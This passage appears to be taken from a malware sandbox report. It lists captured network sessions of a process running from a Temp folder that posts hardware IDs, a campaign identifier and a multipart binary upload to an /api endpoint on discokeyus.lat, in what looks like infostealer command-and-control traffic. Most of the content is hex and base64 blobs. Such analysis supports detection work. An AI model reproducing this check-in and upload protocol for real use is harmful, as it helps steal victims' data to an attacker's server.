491ck2D9wd/aG2EGel5wBqaRqF4Gs7VwS4YgYf9QJoJMYSLoQovj5e43Q3UffEpy1OTNciTS0VJx4EENjDUKoDoMAKkGnK2svzdDYwJ8Sl3ds80wJImXFSHkQQ2dMU3tPA1B+wyaqbq5fwBqFzsVY8f7xjdr29hSZ6RFG91qBM8pFUPeAY6q/ac3GiQfMFI8hPDNPGrV0Rsj7kgFnDRM8iUHSvsCmaiwsGsNYBAwE2nHs4R8Y
2024-12-22 01:17:59 UTC	1369	IN	Data Raw: 38 6d 58 53 6d 6d 33 63 41 43 4d 49 31 48 74 50 67 55 41 37 6b 79 47 34 37 71 30 4f 56 73 6b 45 44 41 63 59 63 66 38 7a 54 31 6b 77 39 67 53 4b 75 78 4b 42 35 63 39 53 2b 38 67 43 55 66 35 43 35 69 73 75 72 42 2f 44 47 64 59 63 6c 4a 6a 33 4c 4f 53 66 45 54 42 31 42 45 39 36 56 4e 44 67 6e 78 64 6f 43 6b 50 41 4b 6c 43 6d 61 32 38 74 58 6b 52 62 42 4d 33 46 33 62 50 2b 73 63 78 5a 4e 7a 64 48 53 72 6b 52 51 6d 58 50 55 37 6b 49 77 35 47 38 51 4c 66 37 66 32 2f 59 55 4d 38 57 42 38 58 64 4d 50 2f 33 48 35 65 6b 63 68 63 4d 4b 52 46 44 39 31 71 42 4f 67 72 41 45 50 36 44 5a 79 72 74 71 70 35 45 57 49 56 4f 51 42 69 77 66 33 41 50 33 62 62 32 52 51 71 37 55 6b 4b 6d 44 56 41 6f 47 42 44 52 2b 6c 43 78 2b 4f 63 74 58 49 50 62 67 38 38 55 6e 75 4b 36 6f 6f 37 Data Ascii: 8mXSmm3cACMI1HtPgUA7kyG47q0OVskEDAcYcf8zT1kw9gSKuxKB5c9S+8gCUf5C5isurB/DGdYclJj3LOSfETB1BE96VNDgnxdoCkPAKlCma28tXkRbBM3F3bP+scxZNzdHSrkRQmXPU7kIw5G8QLf7f2/YUM8WB8XdMP/3H5ekchcMKRFD91qBOgrAEP6DZyrtqp5EWIVOQBiwf3AP3bb2RQq7UkKmDVAoGBDR+lCx+OctXIPbg88UnuK6oo7
2024-12-22 01:17:59 UTC	1369	IN	Data Raw: 51 6d 36 55 35 44 30 33 4a 44 2b 47 35 62 41 4e 73 42 69 36 43 33 2b 6b 77 41 61 68 59 37 42 43 54 62 76 64 4e 38 59 39 32 58 53 6d 6e 70 51 77 75 62 49 45 76 74 4c 51 31 4f 2f 67 65 51 71 37 32 34 64 41 5a 67 45 7a 63 52 61 63 44 68 77 44 78 73 31 4e 59 59 49 36 51 4d 51 35 6f 71 42 4c 68 75 4d 6c 66 36 51 4b 71 67 73 37 5a 2b 46 53 51 48 63 67 73 6b 77 2f 2b 4b 5a 43 54 63 33 78 63 73 36 30 4d 4a 6b 7a 64 4f 37 43 59 4e 51 2b 4d 4e 6d 36 4f 78 73 48 4d 4f 61 68 77 30 47 32 2f 50 39 63 6f 39 62 70 47 5a 55 69 37 38 41 6c 76 64 42 6b 50 73 49 77 77 43 78 41 47 52 72 62 71 75 4f 52 77 71 41 58 77 56 61 49 53 72 69 6a 42 74 30 64 77 59 4c 65 52 46 44 70 67 78 51 2b 4d 6a 42 45 72 2f 42 5a 75 76 74 4c 56 2f 41 32 4d 63 4f 51 42 68 7a 66 2f 47 66 43 71 52 30 Data Ascii: Qm6U5D03JD+G5bANsBi6C3+kwAahY7BCTbvdN8Y92XSmnpQwubIEvtLQ1O/geQq724dAZgEzcRacDhwDxs1NYYI6QMQ5oqBLhuMlf6QKqgs7Z+FSQHcgskw/+KZCTc3xcs60MJkzdO7CYNQ+MNm6OxsHMOahw0G2/P9co9bpGZUi78AlvdBkPsIwwCxAGRrbquORwqAXwVaISrijBt0dwYLeRFDpgxQ+MjBEr/BZuvtLV/A2McOQBhzf/GfCqR0
2024-12-22 01:17:59 UTC	1369	IN	Data Raw: 62 51 35 6f 2b 42 4c 68 75 43 6b 6e 6a 44 4a 47 71 73 4c 35 78 42 47 6f 56 4e 78 52 76 77 2f 54 4d 4d 57 7a 63 30 68 45 6f 34 45 67 52 6e 6a 6c 4f 37 53 52 44 44 72 45 46 68 2b 50 6c 2b 46 34 50 54 51 67 6e 41 48 4b 45 37 49 51 6c 4a 4e 62 62 55 6e 47 6b 51 51 79 55 50 55 7a 6f 49 51 78 45 2f 77 53 5a 72 72 69 33 63 78 46 73 46 6a 45 5a 61 38 2f 68 79 6a 46 67 33 64 4d 61 49 75 34 43 54 64 30 31 58 4b 42 32 51 33 58 38 44 5a 2b 67 71 2f 68 6d 54 58 31 59 4f 78 34 6b 6e 4c 50 47 4d 6d 54 65 32 78 34 69 37 45 4d 50 6b 7a 56 42 36 53 59 4c 55 76 41 47 6c 36 4b 7a 74 33 67 48 59 52 30 34 46 57 44 43 2f 49 70 79 4a 4e 62 50 55 6e 47 6b 62 53 53 6f 63 47 58 61 62 68 77 4f 36 45 4b 59 72 2f 33 67 4f 51 39 6e 46 44 51 64 59 73 33 2f 77 44 56 76 33 64 77 57 4a 65 Data Ascii: bQ5o+BLhuCknjDJGqsL5xBGoVNxRvw/TMMWzc0hEo4EgRnjlO7SRDDrEFh+Pl+F4PTQgnAHKE7IQlJNbbUnGkQQyUPUzoIQxE/wSZrri3cxFsFjEZa8/hyjFg3dMaIu4CTd01XKB2Q3X8DZ+gq/hmTX1YOx4knLPGMmTe2x4i7EMPkzVB6SYLUvAGl6Kzt3gHYR04FWDC/IpyJNbPUnGkbSSocGXabhwO6EKYr/3gOQ9nFDQdYs3/wDVv3dwWJe
2024-12-22 01:17:59 UTC	1369	IN	Data Raw: 4d 30 58 6d 50 41 52 4a 34 77 79 53 72 4c 57 77 63 41 4a 67 48 54 45 55 61 4d 37 79 7a 54 4a 71 32 5a 64 63 61 65 4e 61 51 38 56 79 5a 66 41 31 45 56 62 38 49 35 4b 73 2f 61 63 33 47 69 51 66 4d 46 49 38 68 50 72 59 4f 47 6e 44 33 68 55 6e 36 30 45 52 6e 44 39 50 38 69 6b 4d 52 50 59 4f 6d 61 79 37 75 58 77 4a 61 42 38 35 47 57 76 49 73 34 52 38 59 38 6d 58 53 6d 6e 4b 53 52 43 4b 4d 55 72 72 4f 42 67 41 37 6b 79 47 34 37 71 30 4f 56 73 6b 47 7a 63 5a 59 4d 54 2f 79 6a 68 70 30 63 55 64 4c 75 4e 4c 43 49 38 34 51 2b 63 6c 43 30 76 2b 42 49 32 76 73 36 70 38 45 58 5a 59 63 6c 4a 6a 33 4c 4f 53 66 46 4c 57 78 77 49 71 70 6e 4d 56 6e 69 52 50 37 53 4a 44 58 37 38 62 33 36 53 78 2b 43 46 44 59 68 63 31 45 57 76 46 2b 73 59 78 59 64 6a 53 45 79 2f 67 53 41 6d Data Ascii: M0XmPARJ4wySrLWwcAJgHTEUaM7yzTJq2ZdcaeNaQ8VyZfA1EVb8I5Ks/ac3GiQfMFI8hPrYOGnD3hUn60ERnD9P8ikMRPYOmay7uXwJaB85GWvIs4R8Y8mXSmnKSRCKMUrrOBgA7kyG47q0OVskGzcZYMT/yjhp0cUdLuNLCI84Q+clC0v+BI2vs6p8EXZYclJj3LOSfFLWxwIqpnMVniRP7SJDX78b36Sx+CFDYhc1EWvF+sYxYdjSEy/gSAm
2024-12-22 01:17:59 UTC	1369	IN	Data Raw: 44 46 4e 57 62 45 46 6b 2b 50 6c 2b 48 6f 45 5a 78 6b 32 47 32 6a 4c 39 4d 34 75 62 74 62 46 45 79 6a 76 54 77 2b 64 50 30 6e 71 4c 77 70 4e 2f 51 2b 59 70 4c 4b 39 4f 55 30 6b 48 79 52 53 50 49 54 53 78 7a 64 6f 69 6f 31 53 4e 71 70 62 51 35 6f 2b 42 4c 68 75 41 30 72 30 43 4a 4b 67 73 72 74 72 41 6d 49 4b 50 42 39 75 31 76 6e 42 4f 57 6e 63 32 68 45 76 34 6b 6b 50 6a 7a 74 45 34 79 56 44 44 72 45 46 68 2b 50 6c 2b 46 6f 55 63 68 49 37 48 6e 4c 50 38 73 6b 71 61 63 47 58 58 47 6e 31 52 52 4c 64 61 6c 4c 77 4f 51 52 66 76 78 76 66 70 4c 48 34 49 55 4e 69 45 54 6f 56 59 73 72 68 7a 7a 70 72 33 74 34 62 4c 65 78 42 41 35 6b 32 51 2b 55 74 44 30 76 32 41 5a 43 6e 74 4c 5a 77 44 43 52 57 66 42 56 38 68 4b 75 4b 48 58 2f 53 32 78 39 70 2b 77 77 61 33 54 56 49 Data Ascii: DFNWbEFk+Pl+HoEZxk2G2jL9M4ubtbFEyjvTw+dP0nqLwpN/Q+YpLK9OU0kHyRSPITSxzdoio1SNqpbQ5o+BLhuA0r0CJKgsrtrAmIKPB9u1vnBOWnc2hEv4kkPjztE4yVDDrEFh+Pl+FoUchI7HnLP8skqacGXXGn1RRLdalLwOQRfvxvfpLH4IUNiEToVYsrhzzpr3t4bLexBA5k2Q+UtD0v2AZCntLZwDCRWfBV8hKuKHX/S2x9p+wwa3TVI
2024-12-22 01:17:59 UTC	1369	IN	Data Raw: 43 70 51 72 2b 6f 71 37 31 2b 46 53 59 74 50 78 78 71 77 2b 57 4b 49 31 75 66 6c 78 30 7a 70 42 6f 36 68 48 4a 44 37 47 35 62 41 4f 51 46 6e 36 53 6e 72 6e 34 50 64 52 4d 78 48 6b 62 4c 39 4e 77 2f 61 39 4c 47 47 32 58 76 54 30 50 54 63 6b 50 34 62 6c 73 41 33 67 57 4a 6f 4a 4b 37 61 41 6f 6b 56 6e 77 56 63 6f 53 72 69 67 49 6b 77 39 51 43 4b 75 74 54 50 64 31 71 58 64 35 75 43 46 62 32 45 70 79 31 74 72 56 31 45 6c 70 59 5a 45 59 32 6c 71 47 59 62 6e 75 52 79 43 31 6e 70 45 4e 44 78 51 74 64 6f 44 68 44 47 4b 4e 4d 33 37 48 39 34 44 6c 45 5a 77 6f 75 46 47 66 53 38 49 30 43 57 76 62 42 47 43 37 30 52 52 53 53 63 67 71 67 49 55 4d 59 79 45 4b 57 70 4b 61 70 62 77 35 30 48 33 77 74 4b 6f 54 72 69 6d 51 6b 35 4e 51 63 4a 2b 4e 55 45 74 41 56 55 75 6f 70 45 Data Ascii: CpQr+oq71+FSYtPxxqw+WKI1uflx0zpBo6hHJD7G5bAOQFn6Snrn4PdRMxHkbL9Nw/a9LGG2XvT0PTckP4blsA3gWJoJK7aAokVnwVcoSrigIkw9QCKutTPd1qXd5uCFb2Epy1trV1ElpYZEY2lqGYbnuRyC1npENDxQtdoDhDGKNM37H94DlEZwouFGfS8I0CWvbBGC70RRSScgqgIUMYyEKWpKapbw50H3wtKoTrimQk5NQcJ+NUEtAVUuopE
2024-12-22 01:17:59 UTC	1369	IN	Data Raw: 53 72 50 47 32 63 67 4e 6a 43 43 6f 4a 4b 4d 7a 77 30 43 5a 61 37 2f 77 65 4c 2b 4e 59 42 4a 73 55 5a 4b 42 67 51 30 2b 78 57 71 62 6a 39 66 68 47 54 53 51 41 66 45 6f 6b 38 66 44 45 4d 6d 50 48 78 6c 38 42 78 33 67 35 33 78 35 44 39 57 77 33 52 2b 45 54 6c 4b 36 78 2b 44 64 44 59 6c 68 6b 51 69 71 45 39 39 74 38 50 49 47 46 53 58 79 33 46 56 50 50 4c 51 72 35 62 68 55 41 71 56 44 52 34 36 2f 34 49 55 4d 6a 47 79 34 41 59 73 66 6c 79 58 74 61 37 2f 41 63 4c 75 56 55 45 34 6f 39 65 74 34 37 41 45 37 2f 42 59 6d 79 2f 66 59 35 44 43 52 41 42 56 49 73 68 4d 79 45 66 48 79 52 6a 31 49 63 35 30 77 4e 6d 69 52 56 72 51 6b 4e 52 2f 41 55 6a 37 53 79 2b 44 64 44 59 6c 68 6b 51 43 71 45 39 39 74 38 50 49 47 46 53 58 79 33 46 56 50 50 4c 51 72 35 62 68 55 41 71 56 Data Ascii: SrPG2cgNjCCoJKMzw0CZa7/weL+NYBJsUZKBgQ0+xWqbj9fhGTSQAfEok8fDEMmPHxl8Bx3g53x5D9Ww3R+ETlK6x+DdDYlhkQiqE99t8PIGFSXy3FVPPLQr5bhUAqVDR46/4IUMjGy4AYsflyXta7/AcLuVUE4o9et47AE7/BYmy/fY5DCRABVIshMyEfHyRj1Ic50wNmiRVrQkNR/AUj7Sy+DdDYlhkQCqE99t8PIGFSXy3FVPPLQr5bhUAqV
2024-12-22 01:17:59 UTC	1369	IN	Data Raw: 76 7a 73 6a 59 77 34 2f 55 69 71 45 2f 34 70 6b 4a 4e 44 64 41 69 54 72 52 55 2b 61 4b 45 4f 67 59 45 4e 4f 73 56 72 66 6f 72 65 6f 64 41 78 6a 56 44 6f 63 61 6f 54 73 68 43 55 6b 78 35 64 4b 65 71 6f 43 45 64 31 71 42 4b 63 74 45 56 4c 33 41 59 6d 67 2b 6f 5a 48 4c 6e 59 66 4c 42 45 6d 39 66 37 4f 4b 6e 48 53 78 78 55 58 32 6d 38 52 6d 69 4a 48 6f 68 38 56 51 2f 45 4d 6d 4f 50 7a 2b 47 46 44 50 46 67 52 41 47 50 55 38 49 70 79 4a 4e 32 58 53 6d 6e 70 55 41 53 4e 4d 51 6a 6e 4e 41 51 41 37 6b 79 47 34 36 76 34 49 56 41 71 57 43 35 53 50 49 53 30 78 44 46 6c 30 74 6b 52 4f 2f 5a 45 41 49 73 78 41 39 34 51 4c 6c 4c 32 45 70 7a 68 6a 4c 56 39 46 58 45 62 4c 42 56 61 2b 74 37 59 4f 33 54 53 6c 54 34 75 36 55 34 39 6f 77 56 56 35 7a 35 42 5a 76 49 55 6e 4f 50 Data Ascii: vzsjYw4/UiqE/4pkJNDdAiTrRU+aKEOgYENOsVrforeodAxjVDocaoTshCUkx5dKeqoCEd1qBKctEVL3AYmg+oZHLnYfLBEm9f7OKnHSxxUX2m8RmiJHoh8VQ/EMmOPz+GFDPFgRAGPU8IpyJN2XSmnpUASNMQjnNAQA7kyG46v4IVAqWC5SPIS0xDFl0tkRO/ZEAIsxA94QLlL2EpzhjLV9FXEbLBVa+t7YO3TSlT4u6U49owVV5z5BZvIUnOP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50120	104.21.21.99	443	348	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:11 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: discokeyus.lat
2024-12-22 01:18:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-22 01:18:12 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=um4oeo9elhg70cllbg1lkfe7np; expires=Wed, 16 Apr 2025 19:04:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4h54KVse2f9E4V7UZ4xRkXTO4TMsbY2qYGXMHT%2FUacCDWoZ5%2Fo9FnQrx%2Ftgssy2pgiuKo3T32BQQl20hYyCSh6xZKfr8vllV0CtMCLZRXBy%2FkiY8NE%2F4lRaRqpSXIMAzYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c46cb09ec8c33-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2105&min_rtt=1981&rtt_var=991&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=981512&cwnd=245&unsent_bytes=0&cid=4ad4cb7dd8f737be&ts=1023&x=0"
2024-12-22 01:18:12 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-22 01:18:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50125	104.21.21.99	443	7012	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:13 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TQH71NTJ009JG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18133 Host: discokeyus.lat
2024-12-22 01:18:13 UTC	15331	OUT	Data Raw: 2d 2d 54 51 48 37 31 4e 54 4a 30 30 39 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 51 48 37 31 4e 54 4a 30 30 39 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 51 48 37 31 4e 54 4a 30 30 39 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 54 51 48 37 31 4e 54 4a 30 30 39 Data Ascii: --TQH71NTJ009JGContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--TQH71NTJ009JGContent-Disposition: form-data; name="pid"2--TQH71NTJ009JGContent-Disposition: form-data; name="lid"PsFKDg--pablo--TQH71NTJ009
2024-12-22 01:18:13 UTC	2802	OUT	Data Raw: 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2024-12-22 01:18:14 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9qn8vs55t06mdb9tnchfsg68vc; expires=Wed, 16 Apr 2025 19:04:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3j3OWsAIDjxM02ttKYmzLjxvgksZFWjx%2BETWjrHuJSYHkf4RlNU7W7qMJ7uyhrUJIW58LqRA0dcgq9UPnYHvmrvqV5mdYzO5%2BNCJ6adwZ3a%2FvTL1%2FMhDg7IGE2Kx4xkgQQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c46d6da84729e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=2025&rtt_var=776&sent=17&recv=21&lost=0&retrans=0&sent_bytes=2833&recv_bytes=19088&delivery_rate=1396461&cwnd=165&unsent_bytes=0&cid=3d746de4edc4f9f1&ts=881&x=0"
2024-12-22 01:18:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50128	104.21.21.99	443	348	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:13 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: discokeyus.lat
2024-12-22 01:18:13 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-22 01:18:14 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lucqojs1nnbrce2pu7sa56sc61; expires=Wed, 16 Apr 2025 19:04:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=674IIAwVWtT7RZ40Tq4EQyZK61DMhvk62S%2B%2BsZ502BFXZtNYUjfLW9GaYRSZgflmiJ2nr%2BNvQv4rdhg68NDhdov5Ir0DNlYU7OUb4iUCb8JTM2EINk%2F6GQPoIxUiFoDpQg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c46d98c944392-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1698&rtt_var=641&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=945&delivery_rate=1719670&cwnd=234&unsent_bytes=0&cid=f4835c41603a4726&ts=780&x=0"
2024-12-22 01:18:14 UTC	242	IN	Data Raw: 31 63 62 66 0d 0a 6b 51 56 35 64 76 4e 6c 66 58 44 56 4e 51 67 44 4e 6d 54 30 43 4a 37 66 6a 78 6d 44 47 52 67 4b 35 52 73 4c 32 72 30 2f 51 61 37 71 4a 77 39 55 79 56 46 52 55 71 5a 51 4b 6a 6c 43 46 6f 46 74 73 76 33 75 66 61 45 6a 66 6d 75 4a 61 47 37 32 6e 30 6b 73 6a 4b 74 6a 47 42 71 41 41 46 46 53 73 45 30 71 4f 57 30 66 31 6d 33 77 2f 62 55 37 35 6e 4e 36 61 34 6c 35 61 72 48 53 54 79 33 4e 2b 57 6b 65 48 70 59 47 47 52 47 35 57 47 31 6d 55 77 57 65 5a 76 65 79 35 33 53 68 4e 54 70 76 6e 7a 6b 78 2b 50 42 61 4e 63 2f 63 5a 41 6f 64 30 52 68 52 43 2f 64 51 5a 69 45 4d 52 70 56 74 2f 4c 50 70 66 65 68 78 63 47 4b 42 65 47 2b 77 7a 56 59 6e 78 76 6c 6e 48 52 2b 63 44 77 30 63 73 31 39 6d 59 46 6b 46 31 69 53 38 Data Ascii: 1cbfkQV5dvNlfXDVNQgDNmT0CJ7fjxmDGRgK5RsL2r0/Qa7qJw9UyVFRUqZQKjlCFoFtsv3ufaEjfmuJaG72n0ksjKtjGBqAAFFSsE0qOW0f1m3w/bU75nN6a4l5arHSTy3N+WkeHpYGGRG5WG1mUwWeZvey53ShNTpvnzkx+PBaNc/cZAod0RhRC/dQZiEMRpVt/LPpfehxcGKBeG+wzVYnxvlnHR+cDw0cs19mYFkF1iS8
2024-12-22 01:18:14 UTC	1369	IN	Data Raw: 75 76 55 37 75 54 73 70 57 6f 52 6f 65 4b 33 53 54 53 57 4d 37 43 6b 43 56 4a 59 4c 58 30 72 33 58 32 5a 76 55 51 57 5a 62 66 32 39 2f 33 54 68 65 48 4a 67 67 33 4e 6d 74 39 42 54 4b 63 76 37 62 68 77 62 6c 67 38 5a 48 62 51 58 4a 43 46 54 48 74 59 79 76 4a 33 39 65 4f 4a 76 64 33 6e 48 5a 69 65 68 6e 31 6f 76 6a 4b 73 6e 48 52 71 51 43 68 38 41 76 31 78 68 5a 45 59 4e 6e 32 66 78 76 65 42 78 37 6e 68 36 62 34 31 7a 5a 72 4c 62 55 43 37 4b 38 32 64 62 57 74 45 41 42 31 4c 76 46 30 6c 6b 52 41 47 61 66 4c 36 48 72 57 53 76 59 6a 70 76 69 7a 6b 78 2b 4e 64 59 49 4d 2f 34 61 42 67 63 6d 68 55 66 41 4c 46 61 62 33 4e 53 41 35 68 67 2f 36 2f 6e 64 65 64 34 63 32 4f 4f 66 47 36 38 6e 78 4e 6a 79 2b 73 6e 51 31 53 77 43 68 51 65 76 55 42 71 49 55 74 49 6a 79 72 Data Ascii: uvU7uTspWoRoeK3STSWM7CkCVJYLX0r3X2ZvUQWZbf29/3TheHJgg3Nmt9BTKcv7bhwblg8ZHbQXJCFTHtYyvJ39eOJvd3nHZiehn1ovjKsnHRqQCh8Av1xhZEYNn2fxveBx7nh6b41zZrLbUC7K82dbWtEAB1LvF0lkRAGafL6HrWSvYjpvizkx+NdYIM/4aBgcmhUfALFab3NSA5hg/6/nded4c2OOfG68nxNjy+snQ1SwChQevUBqIUtIjyr
2024-12-22 01:18:14 UTC	1369	IN	Data Raw: 65 64 30 64 32 54 48 4e 79 6d 2f 78 78 31 37 6a 4e 6c 6b 44 78 65 62 52 53 6f 52 75 56 6c 74 64 78 51 5a 32 48 4f 38 75 75 45 37 75 54 74 33 61 59 39 2f 65 37 66 53 58 69 33 43 2f 47 49 55 48 4a 45 48 45 68 65 7a 58 47 46 69 57 51 4b 45 59 50 79 31 36 48 72 72 63 54 6f 6d 78 33 35 78 2b 49 63 64 45 74 76 34 4a 53 34 58 6e 77 6b 59 42 50 64 49 4a 48 67 55 41 5a 6f 71 70 50 33 67 63 2b 52 2b 64 57 6d 4e 64 32 79 79 30 31 55 74 7a 2b 46 6f 48 78 53 64 44 78 55 66 75 56 4e 69 61 46 38 4e 6b 47 72 39 74 36 30 31 6f 58 78 69 4b 4e 38 35 58 62 2f 54 55 43 79 4f 78 6d 51 56 47 70 59 52 58 77 33 35 54 69 70 6d 57 45 62 4f 4b 76 43 30 37 58 44 72 66 33 70 76 69 6e 78 71 76 39 78 51 4a 4d 62 39 59 42 38 59 6d 41 6f 5a 45 72 42 54 62 33 4e 52 44 35 70 6d 76 50 4f 74 Data Ascii: ed0d2THNym/xx17jNlkDxebRSoRuVltdxQZ2HO8uuE7uTt3aY9/e7fSXi3C/GIUHJEHEhezXGFiWQKEYPy16HrrcTomx35x+IcdEtv4JS4XnwkYBPdIJHgUAZoqpP3gc+R+dWmNd2yy01Utz+FoHxSdDxUfuVNiaF8NkGr9t601oXxiKN85Xb/TUCyOxmQVGpYRXw35TipmWEbOKvC07XDrf3pvinxqv9xQJMb9YB8YmAoZErBTb3NRD5pmvPOt
